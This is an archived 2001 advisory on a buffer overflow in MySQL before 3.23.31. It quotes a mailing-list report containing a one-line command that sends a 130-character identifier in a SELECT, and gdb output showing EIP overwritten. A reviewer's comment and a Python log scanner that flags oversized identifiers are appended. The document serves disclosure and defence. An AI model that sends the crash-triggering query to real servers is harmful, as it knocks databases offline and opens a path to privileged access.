Buffer overflow in MySQL < 3.23.31


Date: Thu, 18 Jan 2001 18:44:31 +0100
From: Nicolas GREGOIRE <[email protected]>
To: [email protected]
Subject: Buffer overflow in MySQL < 3.23.31

Hi,

all versions of MySQL < 3.23.31 have a buffer-overflow which crashes the
server and which seems to be exploitable (i.e. 4141414 in eip)

Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)

Requirements :
You need a valid login/password to exploit this

Solution :
Upgrade to 3.23.31

Proof-of-concept code :
None

Credits :
I'm not the discoverer of this bug
The first public report was made by [email protected] via the MySQL
mailing-list
See the following mails for details

Regards,
Nicob

Here is the original post to the MySQL mailing-list:

On Jan 12, João Gouveia wrote:
> Hi,
>
> I believe I've found a problem in MySql. Here are some tests I've made in
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although I didn't
> debug it, just tested to see if crashes ). Confirmed up to latest 3.23
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
> </quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal I got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> (gdb)
> </quote>
>
> looks like a typical overflow to me.
> Please reply asap, at least to tell me I'm not seeing things. :-)
>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> [email protected]

Here is the response to an e-mail I sent today to the MySQL list:
Sergei Golubchik (MySQL team) wrote:
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei

Here is part of the 3.23.30 to 3.23.31 diff:
+Changes in release 3.23.31 +-------------------------- + + * Fixed security bug in something (please upgrade if you are using a + earlier MySQL 3.23 version).
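Review bot: the changelog entry is not actionable as written: "Fixed security bug in something" names neither the affected component nor the class of bug, so an operator reading the release notes cannot tell whether their deployment is exposed. Suggest stating what the advisory above already makes public, e.g. `* Fixed a buffer overflow in the server reachable by an authenticated client through an over-long identifier in a SELECT; all earlier 3.23 releases are affected, please upgrade.` Also "a earlier MySQL 3.23 version" should read "an earlier MySQL 3.23 version".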

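Because the only mitigation is upgrading, a defender also wants to know whether anyone has sent the kind of query shown in the report. The following is an added example, not code from the advisory or from MySQL: a small scanner that flags Query lines in a general-log style file carrying an identifier longer than MySQL's 64-character identifier limit (string literals are ignored, since long string data is legitimate). The log layout is assumed and the sample lines are constructed.

```python
import re

# MySQL's documented maximum length for database, table and column identifiers.
MAX_IDENTIFIER_LEN = 64

# Constructed sample lines in a MySQL general-log style (assumed layout, not real logs).
LONG_NAME = "A" * 130                    # the length used in the original report
LONG_STRING = "'" + "B" * 100 + "'"      # long string literal: data, not an identifier
SAMPLE_LOG = "\n".join([
    "010112  7:10:21     3 Connect   jroberto@localhost on test",
    "010112  7:10:21     3 Query     select id from users where name = " + LONG_STRING,
    "010112  7:10:22     3 Query     select a." + LONG_NAME + ".b",
    "                    4 Query     select `col` from t",
    "010112  7:10:22     3 Quit",
])

# Optional timestamp, thread id, command word, then the rest of the line.
LOG_LINE = re.compile(r"^(\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(\w+)\s*(.*)$")
# Single- or double-quoted string literals, with backslash escapes.
STRING_LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")
# Backtick-quoted identifier, or a bare identifier-like token.
IDENTIFIER = re.compile(r"`([^`]+)`|([A-Za-z0-9_$]+)")


def oversized_identifiers(query, limit=MAX_IDENTIFIER_LEN):
    """Return the identifier-like tokens in `query` longer than `limit` characters.
    String literals are blanked out first so that long string data is not counted."""
    stripped = STRING_LITERAL.sub("''", query)
    found = []
    for m in IDENTIFIER.finditer(stripped):
        name = m.group(1) or m.group(2)
        if len(name) > limit:
            found.append(name)
    return found


def scan_general_log(text, limit=MAX_IDENTIFIER_LEN):
    """Return (thread_id, identifier_length) for every Query line with an oversized identifier."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group(3) != "Query":
            continue
        for name in oversized_identifiers(m.group(4), limit):
            hits.append((int(m.group(2)), len(name)))
    return hits


if __name__ == "__main__":
    for thread_id, length in scan_general_log(SAMPLE_LOG):
        print(f"thread {thread_id}: identifier of {length} chars exceeds {MAX_IDENTIFIER_LEN}")
```

On the constructed sample the only hit is thread 3 with a 130-character identifier; the 100-character string literal and the backticked `col` are not reported.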